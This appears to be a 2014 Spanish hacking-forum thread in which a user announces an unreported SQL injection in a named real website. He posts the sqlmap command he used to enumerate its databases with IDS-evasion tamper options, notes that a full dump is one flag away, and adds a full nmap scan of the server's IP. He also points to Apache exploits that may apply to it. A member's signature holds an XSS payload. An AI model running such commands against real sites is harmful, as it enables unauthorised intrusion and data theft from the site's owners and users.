comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQL INJECTION] http://www.idocz.net/Login.php?id='

  • 6 Respuestas
  • 2485 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Mayo 08, 2014, 12:24:37 pm »
Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:

Web: You are not allowed to view links. Register or Login'



Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas

C:\sqlmap>sqlmap.py -u "You are not allowed to view links. Register or Login" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash"  -D idocz_web --tables



utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.

me interese un poco en la version de apache que tiene el servidor que es la  Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.

You are not allowed to view links. Register or Login

y la lista completa para esa version de apache 2.2.14 es:

You are not allowed to view links. Register or Login

nose si serva vulnerable a todos pero alguno seguro!!

He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!

la vulnerabilidad no ha sido reportada.

Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo  :D :D :D :D, gracias a todos por este foro!

« Última modificación: Mayo 08, 2014, 12:27:05 pm por charly837 »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5325
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Mayo 08, 2014, 12:26:10 pm »
Muy bueno bro! Le reportaste el fallo al webmaster?

Saludos!
ANTRAX


Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 08, 2014, 12:28:46 pm »
No, todavia no se lo he reportado, acabo de editar el post poniendo eso precisamente  :D :D :D :D

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5325
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Mayo 08, 2014, 12:42:55 pm »
Espero que lo reparen antes de que algun lammer lo explote.
Muy buen trabajo bro!

Saludos!
ANTRAX


Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« Respuesta #4 en: Mayo 08, 2014, 12:52:33 pm »
Si puedes añadir una captura del reporte estaría genial. Por cierto, no creo que se deban mostrar las tablas (información sensible), con una breve prueba de concepto sobra, saludos.
Contacto: @migueljimeno96 -

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Mayo 08, 2014, 02:45:23 pm »
Os pongo el reporte del nmap que resulta bastante interesante, direis porque usa los parametros -O y -A al mismo tiemop pues nose tengo manias...  ;D ;D ;D ;D ;D

Código: You are not allowed to view links. Register or Login
[*] exec: nmap -sS -PN -O 184.71.243.98 -A -sC


Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-08 15:35 EDT
Nmap scan report for 184.71.243.98
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Home
443/tcp open  ssl/http Apache httpd 2.2.14
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title (text/plain).
| ssl-cert: Subject: commonName=*.idocz.net
| Not valid before: 2014-02-26T13:59:42+00:00
|_Not valid after:  2015-04-02T02:26:31+00:00
|_ssl-date: 2014-05-08T17:27:37+00:00; -2h09m16s from local time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%), Linux 2.6.31 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: Host: pass.idocz.net

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   3.70 ms   192.168.0.1
2   11.03 ms  10.219.32.1
3   13.43 ms  10.127.44.125
4   22.75 ms  10.207.243.53
5   12.49 ms  10.254.5.110
6   13.74 ms  mad-b2-link.telia.net (80.239.160.81)
7   118.82 ms prs-bb2-link.telia.net (80.91.245.60)
8   145.40 ms nyk-bb1-link.telia.net (80.91.253.122)
9   140.56 ms chi-bb1-link.telia.net (213.155.136.19)
10  138.85 ms shawbusiness-ic-300305-chi-eqx-i1.c.telia.net (62.115.12.90)
11  148.43 ms rc2nr-hge0-9-0-0.wp.shawcable.net (66.163.77.201)
12  172.47 ms rc3no-tge0-11-0-11.cg.shawcable.net (66.163.64.173)
13  189.71 ms dx2dt-te3.cg.shawcable.net (64.59.132.158)
14  224.01 ms 184.71.243.98

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.28 seconds

Desconectado charly837

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Mayo 08, 2014, 03:00:24 pm »
Ya he reportado la vulnerabilidad a la pagina web a traves de su correo de contacto, Ya en sus manos queda...

 

¿Te gustó el post? COMPARTILO!



SQLI WAF Bypass y SQLI LoadFile http://www.lasemana.es/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1086
Último mensaje Julio 25, 2013, 02:55:56 am
por hdbreaker
Me ahorre dos días de espera por un fallo de SQL injection

Iniciado por wgetputolink

Respuestas: 3
Vistas: 1649
Último mensaje Agosto 15, 2016, 12:12:46 pm
por cnfs
www.inameh.gob.ve - SQL Injection [UB]

Iniciado por M5f3r0

Respuestas: 0
Vistas: 1462
Último mensaje Septiembre 28, 2013, 02:32:48 pm
por M5f3r0
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1006
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Source Data http://bolivia.infoleyes.com/

Iniciado por hdbreaker

Respuestas: 0
Vistas: 1139
Último mensaje Junio 25, 2013, 10:37:19 pm
por hdbreaker